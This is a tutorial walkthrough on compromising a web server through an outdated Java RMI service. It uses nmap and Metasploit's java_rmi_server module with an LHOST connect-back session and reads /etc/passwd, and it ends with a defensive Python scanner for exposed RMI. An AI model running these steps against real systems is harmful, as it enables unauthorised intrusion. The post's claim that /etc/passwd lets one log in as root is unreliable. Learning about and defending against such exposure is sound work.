Hacking web servers – Java (Easy Hacking)

Java is rarely updated on web servers, so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes and access the password file.

We touch time and again on just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server, it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and the Metasploit Framework, both of which are built into Kali Linux, which we use for most of our tutorials. Download is here: https://www.kali.org/downloads/

First we scan the web server which has an IP address of with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV

We can see Java RMI running on port 1099.

Next we head over to the Metasploit Framework to search for any built-in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self-explanatory: we are performing a search with a type of “exploit” for the platform “java” and the additional term “rmi”. We receive the following output:

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload, so next we list the “info” page.


Then, once we are happy we know what we need to configure, we load the options:

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the remote host(s), i.e. the victim machine(s). We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machine's IP address, so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd



Now that we have everything configured, we just give the “run” cmd, which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using:

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can log in as admin/root and do whatever we want. All because no one updated Java!
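
An added example, not from the original post: a defender-side Python check that parses grepable `nmap -sV -oG` output from a scan of your own hosts and lists every open Java RMI service, including ones moved off port 1099. The sample scan output, the addresses, the set of service names and the function names are constructed for illustration.

```python
import re

# Service names treated as an RMI registry (assumed set for this example).
RMI_SERVICES = {"java-rmi", "rmiregistry"}

# Constructed sample of `nmap -sV -oG -` output; addresses are documentation-range placeholders.
SAMPLE_GREPABLE = (
    "# Nmap scan initiated as: nmap -sV -oG - 192.0.2.0/29\n"
    "Host: 192.0.2.1 (web01.example)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, "
    "80/open/tcp//http//Apache httpd 2.4.52/, 1099/open/tcp//java-rmi//Java RMI/\n"
    "Host: 192.0.2.2 ()\tPorts: 443/open/tcp//ssl|http//nginx 1.24.0/, "
    "1099/filtered/tcp//rmiregistry///\n"
    "Host: 192.0.2.3 (app02.example)\tPorts: 8080/open/tcp//http//Apache Tomcat/, "
    "41099/open/tcp//java-rmi//Java RMI/\n"
    "Host: 192.0.2.4 ()\tStatus: Up\n"
)

def parse_ports(field):
    """Yield (port, state, service, version) from a grepable 'Ports:' field."""
    # Entries look like port/state/proto/owner/service/rpcinfo/version/ and are
    # comma-separated; split only where a new "<port>/" begins so a comma
    # inside a version string does not break an entry apart.
    for entry in re.split(r",\s*(?=\d+/)", field.strip()):
        parts = entry.split("/")
        if len(parts) >= 7 and parts[0].isdigit():
            yield int(parts[0]), parts[1], parts[4], parts[6]

def find_exposed_rmi(grepable_text):
    """Return [(host, port, version)] for every open RMI service in the scan."""
    findings = []
    for line in grepable_text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip comment and summary lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for port, state, service, version in parse_ports(field[len("Ports:"):]):
                # Match on the detected service, not the port number, so a
                # registry on a non-default port is still reported.
                if state == "open" and service in RMI_SERVICES:
                    findings.append((host, port, version))
    return findings

if __name__ == "__main__":
    for host, port, version in find_exposed_rmi(SAMPLE_GREPABLE):
        print(f"{host}:{port} exposes Java RMI ({version or 'version unknown'})")
```

Anything this reports should be patched and, unless remote clients genuinely need it, firewalled off from untrusted networks.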